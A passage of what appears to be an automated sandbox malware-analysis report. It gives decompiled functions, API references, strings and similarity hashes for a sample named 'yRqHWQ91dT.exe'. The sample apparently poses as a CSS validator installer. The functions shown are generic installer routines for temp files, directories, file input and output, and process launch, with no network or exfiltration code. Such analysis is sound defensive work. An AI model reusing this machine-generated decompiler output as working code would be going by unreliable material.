								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bdac =  *0x40bdac & 0x00000000;
					 *0x40bda8 =  *0x40bda8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b890 = 8;
					 *0x415438 = 0x40d430;
					 *0x415434 = 0x40d430;
					 *0x415430 = 0x415430;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004032EA(0x41d448, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b880 = 0x41d448;
						 *0x40b884 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b888 = _t95;
							 *0x40b88c = _v12;
							_t75 = E00406625(0x40b880);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b888; // 0x421ffd
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040521E(0,  &_v88); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b888; // 0x421ffd
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405D37(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004030e0
0x004030e4
0x004030e7
0x004030ec
0x004030ee
0x004030ee
0x004030f5
0x004030f9
0x004030fe
0x00403100
0x00403100
0x00403107
0x0040310c
0x00403117
0x00403117
0x00403129
0x004032d8
0x004032d8
0x00000000
0x0040312f
0x00403133
0x00403285
0x004032c8
0x004032ca
0x004032ca
0x004032d6
0x004032dd
0x004032e0
0x00000000
0x00000000
0x00000000
0x00000000
0x004032d6
0x0040328a
0x00000000
0x00000000
0x0040328c
0x0040328f
0x00403292
0x00403295
0x00403297
0x00403297
0x004032a7
0x00000000
0x00000000
0x004032b5
0x0040327f
0x0040327f
0x004032da
0x004032da
0x00000000
0x004032da
0x004032b7
0x004032ba
0x004032c1
0x00000000
0x00000000
0x00000000
0x004032c3
0x00000000
0x0040328f
0x0040313f
0x00403141
0x00403148
0x0040314f
0x0040314f
0x00403156
0x0040315e
0x00403168
0x0040316d
0x00403175
0x0040317f
0x00403182
0x00000000
0x00000000
0x00000000
0x00000000
0x00403188
0x00403188
0x00403188
0x00403190
0x00403192
0x00403192
0x004031a3
0x00000000
0x00000000
0x004031a9
0x004031ac
0x004031b2
0x004031b8
0x004031b8
0x004031c3
0x004031c9
0x004031ce
0x004031d5
0x004031d8
0x00000000
0x00000000
0x004031de
0x004031e4
0x004031e6
0x004031ef
0x004031f1
0x0040321f
0x00403225
0x0040322e
0x00403233
0x00403233
0x00403238
0x00403273
0x00000000
0x00000000
0x00000000
0x0040323a
0x0040323e
0x00403255
0x0040325a
0x0040325d
0x00403260
0x00403263
0x00403267
0x00000000
0x00000000
0x00000000
0x0040326d
0x00403247
0x0040324e
0x00000000
0x00000000
0x00403250
0x00000000
0x00403250
0x00403238
0x0040327b
0x00000000
0x0040327b
0x00000000
0x00403188

APIs

GetTickCount.KERNEL32 ref: 0040313F
GetTickCount.KERNEL32 ref: 004031E6
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 0040320F
wsprintfA.USER32 ref: 0040321F

Strings

... %d%%, xrefs: 00403219

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405CBF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405cc3
0x00405cc9
0x00405cca
0x00405cca
0x00405ccf
0x00405cd0
0x00405cd3
0x00405cdd
0x00405cea
0x00405ced
0x00405cf5
0x00000000
0x00000000
0x00405cf9
0x00000000
0x00000000
0x00405cfb
0x00000000
0x00405cfb
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405CD3
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED

Strings

nsa, xrefs: 00405CCA
"C:\Users\user\Desktop\yRqHWQ91dT.exe" , xrefs: 00405CBF
C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\yRqHWQ91dT.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1303821082
Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405B28(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405ABA(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405761(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E004056E4(_t28);
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x004022dd
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402a5d
0x00402a69

APIs

Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004056E4: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp, xrefs: 00401631

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp
API String ID: 1892508949-3276176112
Opcode ID: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
Opcode Fuzzy Hash: 8ea1f7cc9a8bf7522c8949f70cf2fb79c547dd436f64854b827cbeb5bc810ff8
Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E

Uniqueness

Uniqueness Score: -1.00%

Function 00405796, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405796(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c098->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c098,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040579f
0x004057bf
0x004057c7
0x004057cc
0x00000000
0x004057d2
0x004057d6

APIs

CreateProcessA.KERNELBASE ref: 004057BF
CloseHandle.KERNEL32(?), ref: 004057CC

Strings

Error launching installer, xrefs: 004057A9

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f470;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec0c =  *0x42ec0c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D

Uniqueness

Uniqueness Score: -1.00%

Function 004052F0, Relevance: 3.0, APIs: 2, Instructions: 32
comCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E004052F0(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x42f468;
				_t10 =  *0x42f46c;
				__imp__OleInitialize(0);
				 *0x42f4f8 =  *0x42f4f8 | __eax;
				E004041C7(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x418;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x42f4cc =  *0x42f4cc + 1;
				}
				L7:
				E004041C7(0x404); // executed
				__imp__OleUninitialize(); // executed
				return  *0x42f4cc;
			}

0x004052f1
0x004052f8
0x00405300
0x00405306
0x0040530e
0x00405315
0x00405317
0x0040531a
0x0040531a
0x0040531f
0x00000000
0x00000000
0x00405330
0x00405338
0x00000000
0x00000000
0x0040533a
0x00000000
0x00405338
0x0040533c
0x0040533c
0x00405342
0x00405347
0x0040534c
0x00405359

APIs

OleInitialize.OLE32(00000000), ref: 00405300

Part of subcall function 004041C7: SendMessageA.USER32 ref: 004041D9

OleUninitialize.OLE32(00000404,00000000), ref: 0040534C

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 27348f06ce87f1f66077e23d5001c35af5604e3d0fe1afc9f40ed646d81b47df
Instruction ID: d823475d3c08908343a682022f3e0037ab1e92dd3cc8d49a61ca0bec2af1321f
Opcode Fuzzy Hash: 27348f06ce87f1f66077e23d5001c35af5604e3d0fe1afc9f40ed646d81b47df
Instruction Fuzzy Hash: 75F090766006018AE3616B549D05B577370DFA0341F95413BFF48B32E0D6F5584A8E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406500, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406500(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E00406492(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406508
0x0040650b
0x00406512
0x0040651a
0x00406526
0x00000000
0x0040652d
0x0040651d
0x00406524
0x00000000
0x00406535
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32 ref: 004064A9
Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C90, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405C90(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405c94
0x00405ca1
0x00405cb6
0x00405cbc

APIs

GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\yRqHWQ91dT.exe,80000000,00000003), ref: 00405C94
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405761, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405761(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405767
0x0040576f
0x00000000
0x00405775
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D08, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D08(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405d0c
0x00405d1c
0x00405d24
0x00000000
0x00405d2b
0x00000000
0x00405d2d

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405D37, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D37(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405d3b
0x00405d4b
0x00405d53
0x00000000
0x00405d5a
0x00000000
0x00405d5c

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
